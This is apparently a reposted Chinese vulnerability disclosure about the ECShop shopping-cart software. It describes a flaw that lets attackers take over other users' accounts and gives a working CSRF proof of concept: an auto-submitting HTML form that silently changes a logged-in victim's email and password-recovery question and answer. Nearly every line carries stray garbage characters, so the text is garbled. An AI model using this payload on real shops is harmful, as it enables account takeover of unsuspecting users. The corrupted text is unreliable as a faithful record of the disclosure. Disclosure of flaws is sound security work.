简要描述:$ }0 l: M: D4 N( ?; Q, k
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现$ v8 c. e$ b8 g7 M/ O8 m! ?
+ O+ ~) _0 }7 M3 }* \0 x# n8 \Demo For:http://www.wooyun.org/bug.php?action=view&id=395; A4 H- k# K, L) v
9 l1 T5 f a) j; \) ]! c0 z详细说明:
& j$ @; A8 ?8 x' F( F6 _利用csrf和xss可以突破官方所说的“障碍”
. G) h1 X2 A2 i+ W2 {) L/ I8 O& [xss版本已经有人说明7 T, I8 h3 \3 d# R
这里给出csrf版本
, C' D' v) j- _1 }" S) i9 Y3 X( {! j6 O* S* S* n' m ?
漏洞证明:6 z8 Z7 h& Q: o. A7 i
<html>
0 O# E* X" u( [' L/ _<body>! d$ A& _3 ]6 n3 [: f& Z9 {; b; }; b
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
+ O* @( o/ B3 ]3 S( \<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
4 Z/ ]1 C4 F3 V, q5 U<INPUT TYPE="text" NAME="act" value="act_edit_profile">- I0 I* Y, D, g# n, f9 P7 q) N
<INPUT TYPE="text" NAME="sel_question" value="ecshop"> m( k! ~7 Q; ` {
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
& I3 O' }% r0 C</body>8 f; u {* m- P) Y
<script>( ~+ {" H" j3 E, [+ C2 I8 d, M
document.forms[0].submit();
; o& M; x/ e3 w T \& @</script>
* g5 D: X) v; E/ i- o; j% g</html>
: ^. g& J/ m: n: [& ^构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
3 _! x2 T! [9 t. C; C7 f% M, k
+ T2 Q( U; q% X2 H' V8 B* j1 e* k |